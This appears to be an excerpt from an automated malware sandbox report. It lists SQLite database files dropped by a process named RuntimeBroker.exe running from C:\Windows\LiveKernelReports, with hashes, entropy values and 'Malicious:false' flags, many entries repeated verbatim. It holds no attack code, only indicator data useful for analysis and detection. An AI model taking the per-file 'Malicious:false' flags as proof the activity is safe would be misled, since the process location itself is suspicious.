                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8745947603342119
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):98304
                                                                                  Entropy (8bit):0.08235737944063153
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8745947603342119
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
